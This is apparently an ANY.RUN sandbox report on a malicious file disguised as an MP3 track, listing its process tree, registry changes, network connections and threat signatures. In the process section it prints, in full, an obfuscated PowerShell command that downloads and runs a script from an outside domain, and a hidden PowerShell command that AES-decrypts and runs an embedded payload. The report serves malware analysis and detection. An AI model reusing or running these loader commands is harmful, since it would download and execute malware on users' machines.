download:

/st5.mp3

Full analysis: https://app.any.run/tasks/b26d2f69-abf3-42f5-9208-cba4fcbbde41
Verdict: Malicious activity
Analysis date: March 12, 2025, 13:33:08
OS: Windows 10 Professional (build: 19045, 64 bit)
Indicators:
MIME: audio/mpeg
File info: Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 192 kbps, 44.1 kHz, Stereo
MD5:

D590D5FBCAA161F835CC2477EEE96B3F

SHA1:

53B137A1DC980D53652992897D0AFE058B6E73E1

SHA256:

689026D41FFEBFAAA64A9854D17A635BA29B114E5D15C40FBBA7BF1B7EE6CA0C

SSDEEP:

98304:JrsSP1FkdpMKpVbx6Ag1JBNdD4QG4AIp2gKvUJUzvkFV+skrYL+7vfw9SVV6ioKs:utpwFr1

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Changes powershell execution policy (Unrestricted)

      • mshta.exe (PID: 7612)
      • powershell.exe (PID: 5740)

    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 5740)
      • powershell.exe (PID: 1164)

    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 1164)

    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 5740)

  • SUSPICIOUS

    • Executes script without checking the security policy

      • powershell.exe (PID: 5740)

    • Probably download files using WebClient

      • powershell.exe (PID: 5740)

    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 5740)
      • mshta.exe (PID: 7612)

    • Returns all items found within a container (POWERSHELL)

      • powershell.exe (PID: 1164)

    • The process bypasses the loading of PowerShell profile settings

      • powershell.exe (PID: 5740)
      • mshta.exe (PID: 7612)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 1164)

    • Probably obfuscated PowerShell command line is found

      • mshta.exe (PID: 7612)

    • Starts a new process with hidden mode (POWERSHELL)

      • powershell.exe (PID: 5740)

  • INFO

    • Reads Internet Explorer settings

      • mshta.exe (PID: 7612)

    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 5740)

    • Checks proxy server information

      • mshta.exe (PID: 7612)
      • powershell.exe (PID: 1164)

    • Disables trace logs

      • powershell.exe (PID: 1164)

    • Returns hidden items found within a container (POWERSHELL)

      • conhost.exe (PID: 4120)

    • Creates a byte array (POWERSHELL)

      • powershell.exe (PID: 1164)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 1164)
      • powershell.exe (PID: 5740)

    • Reads the software policy settings

      • slui.exe (PID: 7804)
      • slui.exe (PID: 3676)

    • Application launched itself

      • firefox.exe (PID: 1328)
      • firefox.exe (PID: 5384)

    • Manual execution by a user

      • firefox.exe (PID: 5384)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.mp3 | LAME encoded MP3 audio (ID3 v2.x tag) (62.5)
.mp3 | MP3 audio (ID3 v2.x tag) (37.5)

EXIF

MPEG

MPEGAudioVersion: 1
AudioLayer: 3
AudioBitrate: 192 kbps
SampleRate: 44100
ChannelMode: Stereo
MSStereo: Off
IntensityStereo: Off
CopyrightFlag: -
OriginalMedia: -
Emphasis: None

ID3

Title: Igor Pumphonia - Deep Inside
Artist: Igor Pumphonia
RecordingTime: 2025
Genre: deephouse, techno
EncoderSettings: Lavf59.27.100
Composer: Igor Pumphonia
PublisherURL: https://www.jamendo.com
Publisher: https://www.jamendo.com
UserDefinedText: (Tagging time) 2025-01-19
EncodedBy: Jamendo:https://www.jamendo.com | LAME
Comment: https://www.jamendo.com cc_standard
FileURL: https://www.jamendo.com/en/track/2231198
ArtistURL: https://www.jamendo.com/en/artist/475967
CopyrightURL: http://creativecommons.org/licenses/by-nc-nd/3.0/
Copyright: http://creativecommons.org/licenses/by-nc-nd/3.0/
PictureMIMEType: image/jpg
PictureType: Front Cover
PictureDescription: Cover
Picture: (Binary data 11285 bytes, use -b option to extract)

Composite

DateTimeOriginal: 2025
Duration: 0:03:18 (approx)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
156
Monitored processes
18
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
start mshta.exe sppextcomobj.exe no specs slui.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs slui.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
680"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5004 -childID 3 -isForBrowser -prefsHandle 4844 -prefMapHandle 4912 -prefsLen 31243 -prefMapSize 244583 -jsInitHandle 1332 -jsInitLen 235124 -parentBuildID 20240213221259 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a134c533-445b-404f-a5b7-aba4ef428aa5} 1328 "\\.\pipe\gecko-crash-server-pipe.1328" 1b7cfafb850 tabC:\Program Files\Mozilla Firefox\firefox.exefirefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
MEDIUM
Description:
Firefox
Exit code:
0
Version:
123.0
Modules
Images
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\msvcp140.dll
c:\windows\system32\vcruntime140.dll
1164"C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Unrestricted -Command (Get-Variable E*t).Value.InvokeCommand.(((Get-Variable E*t).Value.InvokeCommand|Member|Where-Object{(Get-ChildItem Variable:/_).Value.Name -like '*ke*pt'}).Name)(([System.Net.WebClient]::New().DownloadString('https://pn1.gapdevoutlycitrus.shop/88e1f9c1ef43be859dd2f3c4e44b0139'))) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
1328"C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exefirefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
MEDIUM
Description:
Firefox
Exit code:
0
Version:
123.0
Modules
Images
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\msvcp140.dll
c:\windows\system32\vcruntime140.dll
2140"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2148 -parentBuildID 20240213221259 -prefsHandle 2140 -prefMapHandle 2136 -prefsLen 31031 -prefMapSize 244583 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9a75009e-9813-41f7-9d45-7a25c292598f} 1328 "\\.\pipe\gecko-crash-server-pipe.1328" 1b7ba980310 socketC:\Program Files\Mozilla Firefox\firefox.exefirefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
MEDIUM
Description:
Firefox
Exit code:
0
Version:
123.0
Modules
Images
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\msvcp140.dll
c:\windows\system32\vcruntime140.dll
2800\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3332"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4236 -childID 2 -isForBrowser -prefsHandle 4228 -prefMapHandle 4224 -prefsLen 36588 -prefMapSize 244583 -jsInitHandle 1332 -jsInitLen 235124 -parentBuildID 20240213221259 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3d1702e4-cc11-458e-a801-0d63d1445449} 1328 "\\.\pipe\gecko-crash-server-pipe.1328" 1b7cebdba10 tabC:\Program Files\Mozilla Firefox\firefox.exefirefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
MEDIUM
Description:
Firefox
Exit code:
0
Version:
123.0
Modules
Images
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\msvcp140.dll
c:\windows\system32\vcruntime140.dll
c:\windows\system32\vcruntime140_1.dll
c:\windows\system32\crypt32.dll
3676C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
4120\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5384"C:\Program Files\Mozilla Firefox\firefox.exe" C:\Program Files\Mozilla Firefox\firefox.exeexplorer.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
MEDIUM
Description:
Firefox
Exit code:
0
Version:
123.0
Modules
Images
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\program files\mozilla firefox\vcruntime140.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\crypt32.dll
c:\program files\mozilla firefox\vcruntime140_1.dll
c:\windows\system32\bcrypt.dll
5740"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -ep Unrestricted -nop function ZuiZhPk($hFdoraZL){-split($hFdoraZL -replace '..', '0xf7f81a39-5f63-5b42-9efd-1f13b5431005amp; ')};$AbieXTa=ZuiZhPk('B57ADC51B17629EDB23632729244AB9CF1D0F3811693C1ECCEF7FAA35176074A847C9CF8404BB3BA3C833AA767F5505FBA24FFB1D0C61FFE5740F7E7F99D767C6E7A139FBA8FCE40E73C6DBEF4C4E65B8095E93E92B4B155D05B9BF2075279A9C4C65DBB5975D5EAC1AD2FAEBEBCA7AC0C60B11A4BB4FAEDF570AEC372B7D5C0D4A7373551FB5E515FAC4804134134C1B91DB51BC02C1F7561128A67FAE1258FECF4129C3C979C49DDD80DB755B8D01EA122E0BB1BC71CB1B5D2F48DE9CC6F1777901ECD8D0E20E1EFED1B7171FB0F99AD612675FB2C6D2DD42B1EBBE5E21760402DBCC8C7A875FC037C3D28919C24E2A48BDA0A9605819B418603700D9AE5F21F94793CE2DA544DA9733DADCCDDAD1FC96DC63F1BFC03CE6673646183C61579FF4705E95E64AA4637B1985790CF3DFADBFE490FBC66469719CB0D60ABAD25ABC3E2024317A6F043F04BE2D0097A78CA40C48A12BCF0B5A14054D9122BC13289DC99363EF56B68BD62D1CBBE203800EB314D2CFC538405305853EDC9C581A7D1D09905EA75AEC688AF27CA46BEDE43F224785A8E1782E34FD2CE15BAF373F9E988EC73EDF3770C520007957FF520503730EA7C54278053F6D37DE3AED7100562163BCE49A793E2CAC2D7270D23E4AA25528173FDE6503D412B4EDEC00050C718C9CC813809E5E951C572184E85E4A80C368B98918D44A2FB44F69F09FBA475CA07BA7069F13B39C9915C4EF8191703AA2A5BE95FA27C984B4A33136984610BCDB798609E21CB4BDE86B8A0E572E166D05DD8EB5BDDFA716649FCC9A1B795D528496E2EA358A31694696DA708AE4D3E470406816F230D9446CA464A8613697E633C07D4029EB3FA22DBD426D4D84E0EEF315C0E8BD490F209546AA715E7D89EC8BB76783A34239AACB5CD6C058B68B88B');$yVcT=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((ZuiZhPk('78584B734A4869564178717A57615A57')),[byte[]]::new(16)).TransformFinalBlock($AbieXTa,0,$AbieXTa.Length)); & $yVcT.Substring(0,3) $yVcT.Substring(3)C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
Total events
22 613
Read events
22 595
Write events
18
Delete events
0

Modification events

(PID) Process:(7612) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(7612) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(7612) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(1164) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(1164) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(1164) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(1164) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(1164) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(1164) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(1164) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
Executable files
0
Suspicious files
161
Text files
18
Unknown types
0

Dropped files

PID
Process
Filename
Type
7612mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\st5[1].mp3
MD5:
SHA256:
1328firefox.exeC:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\9kie7cg6.default-release\startupCache\scriptCache-current.bin
MD5:
SHA256:
7612mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D077F3BA01F0F2293C650040B1B80D25_7A7CE3D23A3E2314C57AED2871CEC791binary
MD5:4B54953AC8B7A09E849D59DB5075616B
SHA256:4AEF9B9CA185AC94FA37AB376B9165E088BF540B7CCAA8B61B3700F9A8A314F1
7612mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\0DA515F703BB9B49479E8697ADB0B955_4136D3715888E22D65EBE484B233D81Bbinary
MD5:B15FCC3CE647D26D29B8B10DE0A81505
SHA256:E92A6DF7D133688C996E64B5B119F25CB5D2C205146575A6C42896957C0223A6
7612mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\0DA515F703BB9B49479E8697ADB0B955_4136D3715888E22D65EBE484B233D81Bbinary
MD5:AEEAC18E777732930D47D24A1883CF21
SHA256:0051223934161B97AF6423D7E030723674C287E7C2BF312D78496C15D140062E
7612mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B039FEA45CB4CC4BBACFC013C7C55604_FA4759C1FDA1D5B56F6A969553761240binary
MD5:94790F2D708AC46065BAFA1BFAFCB10B
SHA256:A5AACBE6510911CD7A6E1C3151F906BD2D4471FFF93E08BFB59D8498A388312C
7612mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\D077F3BA01F0F2293C650040B1B80D25_7A7CE3D23A3E2314C57AED2871CEC791binary
MD5:F7A79D3D9117D9C49AA85F9F42163400
SHA256:317B54000777AE069C56DAF58774C7951FE2E9DF035BBDB181D88B6BDB325E49
5740powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9RBH1ZI061NNRUAGZBEK.tempbinary
MD5:F3DA7E4E2A7C8FF8FBDF304097C5F2E9
SHA256:B035929CA39FC05F6C35083C5C6C08E0A5A770000D42C8BC55F7D9A9F103AFBF
5740powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_c3xhkvhs.psl.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5740powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_fmmv4gep.zp1.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
22
TCP/UDP connections
62
DNS requests
94
Threats
2

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
23.48.23.143:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
7612
mshta.exe
GET
200
104.18.21.226:80
http://ocsp.globalsign.com/rootr1/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6%2BMgGqMQQUYHtmGkUNl8qJUC99BM00qP%2F8%2FUsCDQHuXxad%2F5c1K2Rl1mo%3D
unknown
whitelisted
7612
mshta.exe
GET
200
151.101.2.133:80
http://ocsp2.globalsign.com/rootr3/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBT1nGh%2FJBjWKnkPdZIzB1bqhelHBwQUj%2FBLf6guRSSuTVD6Y5qL3uLdG7wCEQCB5auY5G81uRwv%2BheHGMha
unknown
whitelisted
7612
mshta.exe
GET
200
104.18.21.226:80
http://ocsp.globalsign.com/gsgccr3ovtlsca2024/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBT%2BeHEVW1om2JjNh%2BetTEbfp%2BiVWQQU2tOoCEgMNDdY7uWndS5Z%2FNbcPDgCDAk0SgfF5XqJBRMySA%3D%3D
unknown
whitelisted
7252
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
7944
backgroundTaskHost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
7252
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
GET
200
34.107.221.82:80
http://detectportal.firefox.com/canonical.html
unknown
whitelisted
GET
200
34.107.221.82:80
http://detectportal.firefox.com/success.txt?ipv4
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
192.168.100.255:137
whitelisted
2104
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5352
RUXIMICS.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
23.48.23.143:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
7612
mshta.exe
47.79.80.15:443
default-voice-5.oss-ap-northeast-1.aliyuncs.com
WINDSTREAM
US
unknown
7612
mshta.exe
104.18.21.226:80
ocsp.globalsign.com
CLOUDFLARENET
whitelisted
7612
mshta.exe
151.101.2.133:80
ocsp2.globalsign.com
FASTLY
US
whitelisted
2112
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 40.127.240.158
whitelisted
google.com
  • 142.250.186.46
whitelisted
crl.microsoft.com
  • 23.48.23.143
  • 23.48.23.194
  • 23.48.23.164
  • 23.48.23.173
whitelisted
default-voice-5.oss-ap-northeast-1.aliyuncs.com
  • 47.79.80.15
unknown
ocsp.globalsign.com
  • 104.18.21.226
  • 104.18.20.226
whitelisted
ocsp2.globalsign.com
  • 151.101.2.133
  • 151.101.194.133
  • 151.101.130.133
  • 151.101.66.133
whitelisted
client.wns.windows.com
  • 40.113.103.199
  • 40.115.3.253
whitelisted
login.live.com
  • 20.190.160.2
  • 40.126.32.72
  • 20.190.160.5
  • 20.190.160.132
  • 20.190.160.67
  • 20.190.160.64
  • 20.190.160.130
  • 40.126.32.134
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
arc.msn.com
  • 20.31.169.57
whitelisted

Threats

PID
Process
Class
Message
2196
svchost.exe
Misc activity
ET INFO DNS Query to Alibaba Cloud CDN Domain (aliyuncs .com)
7612
mshta.exe
Misc activity
ET INFO Observed Alibaba Cloud CDN Domain (aliyuncs .com in TLS SNI)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
/st5.mp3